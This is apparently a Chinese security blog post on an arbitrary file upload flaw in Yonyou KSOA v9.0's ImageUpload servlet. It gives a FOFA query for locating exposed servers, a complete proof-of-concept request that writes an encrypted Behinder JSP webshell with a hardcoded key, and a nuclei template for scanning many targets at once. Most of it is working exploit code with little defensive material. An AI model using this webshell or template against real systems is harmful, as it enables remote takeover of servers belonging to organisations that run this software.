用友时空KSOA ImageUpload文件上传漏洞

漏洞简介

用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限

影响版本

用友时空企业信息融通平台KSOA v9.0

漏洞复现

fofa语法:app="用友-时空KSOA"
登录页面如下:

POC:

POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=co0fig.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>


默认上传的冰蝎的webshell,使用冰蝎进行连接

nuclei批量yaml文件

id: yonyou_KOSA_ImageUpload_upload
info:
  name: 用友时空KSOA ImageUpload文件上传漏洞
  author: mhb17
  severity: critical
  description: description
  reference:
    - https://
  tags: upload
requests:
  - raw:
      - |-
        POST /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=co0fig.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Content-Length: 533

        <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - /pictures/co0fig.jsp
      - type: word
        part: header
        words:
          - '200'
posted @   学安全的小白  阅读(572)  评论(0编辑  收藏  举报
相关博文:
· 用友时空KSOA imagefield SQL注入
· 用友移动管理系统任意文件上传漏洞
· 实战红队挖掘漏洞---用友时空KSOA v9.0版本ImageUpload任意文件上传漏洞+getshell
· 用友NC6.5反序列化文件上传漏洞 nuclei
· 信呼OA2.6.3文件上传漏洞
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效
点击右上角即可分享
微信分享提示